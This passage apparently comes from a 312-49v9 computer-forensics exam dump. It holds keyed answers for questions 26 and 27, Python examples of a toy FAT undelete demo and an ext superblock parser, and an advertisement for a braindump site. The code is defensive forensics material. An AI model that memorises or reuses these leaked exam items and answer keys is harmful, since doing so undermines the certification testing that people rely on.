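        self.dir.append({"name": name.encode(), "first": free[0], "size": len(payload)})

    def read(self, name):
        e = self._entry(name.encode())
        out, c = b"", e["first"]
        while c != EOC:                     # follow the chain through the FAT
            out += self.data[c]
            c = self.fat[c]
        return out[:e["size"]]

    def delete(self, name, secure=False):
        e = self._entry(name.encode())
        c = e["first"]
        while c != EOC:                     # free (and, for a secure delete, wipe) each cluster
            nxt = self.fat[c]
            if secure:
                self.data[c][:] = bytes(CLUSTER)
            self.fat[c] = FREE
            c = nxt
        e["name"] = bytes([DELETED]) + e["name"][1:]

    def recover(self, name):
        """Undelete: the entry still holds first cluster and size, the chain is gone,
        so assume the clusters were contiguous (the classic undelete limitation)."""
        e = self._entry(bytes([DELETED]) + name.encode()[1:])
        need = max(1, -(-e["size"] // CLUSTER))
        blob = b"".join(self.data[e["first"] + i] for i in range(need))
        return blob[:e["size"]]


def demo():
    cheque = b"PAY TO THE ORDER OF J. DOE $9,850.00 " * 5          # 185 bytes -> 3 clusters
    vol = ToyFat()
    vol.write("CHEQUE.TXT", cheque)
    vol.delete("CHEQUE.TXT")
    after_delete = vol.recover("CHEQUE.TXT")
    vol.write("NOTES.TXT", b"lunch order")                         # reuses cluster 0
    after_reuse = vol.recover("CHEQUE.TXT")
    wiped = ToyFat()
    wiped.write("CHEQUE.TXT", cheque)
    wiped.delete("CHEQUE.TXT", secure=True)
    after_wipe = wiped.recover("CHEQUE.TXT")
    return {"intact_after_delete": after_delete == cheque,
            "intact_after_reuse": after_reuse == cheque,
            "intact_after_secure_delete": after_wipe == cheque,
            "clobbered_prefix": after_reuse[:11]}


if __name__ == "__main__":
    print(demo())
```

The same mechanics explain why a file that was deleted weeks ago on a busy workstation is often gone while one deleted the day before imaging is usually whole, and why the examiner's first act is to stop further writes.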
NEW QUESTION 26
What does the superblock in Linux define?
- A. File system names
- B. Disk geometry
- C. Location of the first inode
- D. Available space
Answer: C
Explanation:
The ext2/3/4 superblock, 1024 bytes into the volume, records the file system's layout: inode and block counts, block size, blocks and inodes per group, free block and inode counts, mount and write times, state flags and the first non-reserved inode number. The keyed answer is C; the free counts in D are also held there, but the superblock is what tells an examiner where inodes and data begin.
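As an added example (my code, not from the dump or the kernel), the parser below reads the ext2/3/4 superblock from a raw volume image, checks the 0xEF53 magic, and reports the fields an examiner looks at first: block size, volume and free space, inode counts, the first usable inode number, clean/dirty state, last mount and write times, UUID and label. The field offsets are the published ext superblock layout; the 2 KiB sample volume with only its superblock populated is constructed inline.

```python
"""Read the ext2/3/4 superblock: 1024 bytes at byte offset 1024 of the volume."""
import struct
from datetime import datetime, timezone

SB_OFFSET = 1024
EXT_MAGIC = 0xEF53

# (offset within the superblock, struct format, field name) for the fields used here.
FIELDS = [
    (0x00, "<I", "inodes_count"), (0x04, "<I", "blocks_count"),
    (0x0C, "<I", "free_blocks_count"), (0x10, "<I", "free_inodes_count"),
    (0x14, "<I", "first_data_block"), (0x18, "<I", "log_block_size"),
    (0x20, "<I", "blocks_per_group"), (0x28, "<I", "inodes_per_group"),
    (0x2C, "<I", "mtime"), (0x30, "<I", "wtime"), (0x34, "<H", "mnt_count"),
    (0x38, "<H", "magic"), (0x3A, "<H", "state"), (0x4C, "<I", "rev_level"),
    (0x54, "<I", "first_ino"), (0x58, "<H", "inode_size"),
    (0x68, "16s", "uuid"), (0x78, "16s", "volume_name"),
]


def parse_superblock(volume):
    sb = volume[SB_OFFSET:SB_OFFSET + 1024]
    if len(sb) < 1024:
        raise ValueError("volume too small to hold a superblock")
    raw = {name: struct.unpack_from(fmt, sb, off)[0] for off, fmt, name in FIELDS}
    if raw["magic"] != EXT_MAGIC:
        raise ValueError(f"not an ext file system: magic 0x{raw['magic']:04x}")
    block_size = 1024 << raw["log_block_size"]
    return {
        "block_size": block_size,
        "size_bytes": raw["blocks_count"] * block_size,
        "free_bytes": raw["free_blocks_count"] * block_size,
        "inodes": raw["inodes_count"],
        "free_inodes": raw["free_inodes_count"],
        "first_usable_inode": raw["first_ino"],       # 11 on rev-1 volumes: inodes 1-10 are reserved
        "inode_size": raw["inode_size"],
        "block_groups": -(-raw["blocks_count"] // raw["blocks_per_group"]),
        "state": "clean" if raw["state"] & 1 else "dirty (not cleanly unmounted)",
        "mount_count": raw["mnt_count"],
        "last_mounted": datetime.fromtimestamp(raw["mtime"], timezone.utc),
        "last_written": datetime.fromtimestamp(raw["wtime"], timezone.utc),
        "uuid": raw["uuid"].hex(),
        "volume_name": raw["volume_name"].rstrip(b"\x00").decode(),
    }


def build_sample_volume():
    """Constructed 2 KiB stand-in for a 1 GiB ext4 volume: only the superblock is filled in."""
    vol = bytearray(2048)
    values = {
        "inodes_count": 65536, "blocks_count": 262144, "free_blocks_count": 200000,
        "free_inodes_count": 65000, "first_data_block": 0, "log_block_size": 2,
        "blocks_per_group": 32768, "inodes_per_group": 8192,
        "mtime": 1583144100, "wtime": 1583144160, "mnt_count": 7, "magic": EXT_MAGIC,
        "state": 1, "rev_level": 1, "first_ino": 11, "inode_size": 256,
        "uuid": bytes.fromhex("0123456789abcdef0123456789abcdef"), "volume_name": b"evidence",
    }
    for off, fmt, name in FIELDS:
        struct.pack_into(fmt, vol, SB_OFFSET + off, values[name])
    return bytes(vol)


if __name__ == "__main__":
    for key, value in parse_superblock(build_sample_volume()).items():
        print(f"{key:20} {value}")
```

If the primary superblock is damaged, every block group of a real volume (group 0, and groups 1, 3, 5, 7, 9 and the powers of 3, 5 and 7 when the sparse_super feature is on) keeps a backup copy; run the same parser at those group offsets to recover the geometry.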
NEW QUESTION 27
An on-site incident response team is called to investigate an alleged case of computer tampering within their company. Before proceeding with the investigation, the CEO informs them that the incident will be classified as "low level". How long will the team have to respond to the incident?
- A. One working day
- B. Two working days
- C. Immediately
- D. Four hours
Answer: A
100% Valid and Newest Version 312-49v9 Questions & Answers shared by Certleader, Get Full Dumps HERE: https://www.certleader.com/312-49v9-dumps.html (New 209 Q&As)